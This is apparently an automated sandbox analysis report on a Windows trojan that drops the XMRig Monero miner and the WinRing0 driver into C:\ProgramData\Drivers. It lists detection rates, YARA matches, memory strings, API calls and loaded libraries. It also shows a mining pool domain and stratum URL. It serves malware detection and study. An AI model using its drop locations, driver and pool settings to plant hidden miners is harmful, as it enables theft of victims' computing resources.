Windows Analysis Report
SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

AV Detection

Source: C:\ProgramData\Drivers\xmrig.exe

Avira: detection malicious, Label: PUA/GM.Miner.ES

Source: C:\ProgramData\Drivers\xmrig.exe	ReversingLabs: Detection: 60%
Source: C:\ProgramData\Drivers\xmrig.exe	Virustotal: Detection: 72%			Perma Link

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	ReversingLabs: Detection: 34%
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Virustotal: Detection: 57%			Perma Link

Source: C:\ProgramData\Drivers\xmrig.exe

Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.4860872356.000002D3792DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4860872356.000002D3792FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4860806406.000002D377B10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4860425043.000002D377920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2423532193.00007FF61B930000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4860872356.000002D3792D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4860425043.000002D377929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4860806406.000002D377B14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2394891325.0000017F40C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 6952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xmrig.exe PID: 6996, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Drivers\process.bat, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.19.0

Compliance

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Spreading

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175340CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		0_2_00007FF7175340CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71754ADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		0_2_00007FF71754ADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71755F900 FindFirstFileExA,		0_2_00007FF71755F900

Networking

Source: Traffic

Snort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.12:49362 -> 1.1.1.1:53

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: pool.supportxmr.com

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2395943327.0000017F41685000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/wizard
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2395943327.0000017F41685000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

DDoS

Source: tasklist.exe

Process created: 50

System Summary

Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 15.0.xmrig.exe.7ff61ae40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0.3.SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe.17f40c3a2bc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 00000000.00000003.2394891325.0000017F41238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000F.00000000.2423381088.00007FF61B43F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000F.00000000.2422597494.00007FF61AE41000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 00000000.00000003.2394891325.0000017F40C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe PID: 6500, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: xmrig.exe PID: 6996, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\ProgramData\Drivers\xmrig.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF71752C308: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71752C308

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

File created: C:\ProgramData\Drivers\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71752F8F0		0_2_00007FF71752F8F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175503B4		0_2_00007FF7175503B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71753A1CC		0_2_00007FF71753A1CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175430E4		0_2_00007FF7175430E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717525E30		0_2_00007FF717525E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71754ADF0		0_2_00007FF71754ADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717541B80		0_2_00007FF717541B80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71754CAE8		0_2_00007FF71754CAE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71755887C		0_2_00007FF71755887C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717524840		0_2_00007FF717524840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175358D4		0_2_00007FF7175358D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71753B8AC		0_2_00007FF71753B8AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717565758		0_2_00007FF717565758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175447F8		0_2_00007FF7175447F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71753C688		0_2_00007FF71753C688
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71752A66C		0_2_00007FF71752A66C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717542710		0_2_00007FF717542710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71755F6F4		0_2_00007FF71755F6F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175276C0		0_2_00007FF7175276C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717558600		0_2_00007FF717558600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175435C4		0_2_00007FF7175435C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71755C498		0_2_00007FF71755C498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717527288		0_2_00007FF717527288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71753B250		0_2_00007FF71753B250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71752A304		0_2_00007FF71752A304
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71752C308		0_2_00007FF71752C308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175311D4		0_2_00007FF7175311D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175621B0		0_2_00007FF7175621B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717545050		0_2_00007FF717545050
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71753EE74		0_2_00007FF71753EE74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717541E30		0_2_00007FF717541E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF71753AC34		0_2_00007FF71753AC34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717561CE0		0_2_00007FF717561CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717531A5C		0_2_00007FF717531A5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717548A54		0_2_00007FF717548A54
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175503B4		0_2_00007FF7175503B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF717521AA4		0_2_00007FF717521AA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Code function: 0_2_00007FF7175429B8		0_2_00007FF7175429B8

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Drivers\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Drivers\xmrig.exe 0510F1E57B0BC5967A8B658CEA729948219D578B6C9B3A036FF33B4A6A46E495

Source: xmrig.exe.0.dr

Static PE information: Number of sections : 11 > 10

Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamexmrig.exe, vs SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe
Source: SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe, 00000000.00000003.2394891325.0000017F413C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinRing0.sys2 vs SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: dxgidebug.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: sfc_os.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: riched20.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: usp10.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: cscapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: policymanager.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: msvcp110_win.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: pcacli.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
